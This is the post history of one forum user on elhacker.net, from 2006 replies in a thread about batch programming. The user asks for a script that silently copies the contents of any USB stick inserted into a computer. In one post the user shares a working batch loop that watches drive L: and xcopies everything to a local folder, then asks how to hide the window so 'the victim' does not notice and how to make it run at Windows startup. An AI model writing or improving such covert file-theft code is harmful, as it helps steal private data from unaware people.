elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: (TUTORIAL) Aprende a emular Sentinel Dongle By Yapis


  Mostrar Mensajes
Páginas: [1]
1  Informática / Tutoriales - Documentación / Re: TUTORIAL PROGRAMACION BAT en: 17 Enero 2006, 07:15 am
gracias punk ya me va todo :)
2  Informática / Tutoriales - Documentación / Re: TUTORIAL PROGRAMACION BAT en: 15 Enero 2006, 23:50 pm
es la caña ese programa! gracias...y como se haria para que cada vez que se iniciase windows se ejecutase? gracias de nuevo
3  Informática / Tutoriales - Documentación / Re: TUTORIAL PROGRAMACION BAT en: 15 Enero 2006, 20:58 pm
ya lo consegui gracias a tu programa!! Gracias..Lo dejo por si alguien lo quiere:
@echo off
:bucle
If Not Exist L:\ goto cop
If exist L:\ goto copy

:cop
goto bucle

:copy
xcopy "L:\" C:\prueba /s /e

:fin
exit

Ahora lo que quiero es que no salga la ventana en msdos y este en modo invisible para que no se de cuenta la victima, alguna idea?
4  Informática / Tutoriales - Documentación / Re: TUTORIAL PROGRAMACION BAT en: 15 Enero 2006, 20:09 pm
gracias por la respuesta, pero creo que no me entendiste muy bien...porque yo no se como se llama el archivo :( que quiero copiar, y se tendrian que copiar al reves de la memoria usb a el ordenador en el que se mete,saludos
5  Informática / Tutoriales - Documentación / Re: TUTORIAL PROGRAMACION BAT en: 15 Enero 2006, 13:28 pm
y alguien sabe lo que dije?
queria hacer un programa que cuando metas una memoria usb en el ordenador, detecte que la has metido y se copien los archivos en modo oculto(sin que salga la ventana de msdos) todos los archivos de la memoria, alguien me puede decir como hacerlo please?
6  Informática / Tutoriales - Documentación / Re: TUTORIAL PROGRAMACION BAT en: 12 Enero 2006, 21:51 pm
hola,queria hacer un programa que cuando metas una memoria usb en el ordenador, se copian en modo oculto(sin que salga la ventana de msdos) todos los archivos de la memoria, alguien me puede decir como hacerlo please?
Páginas: [1]
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines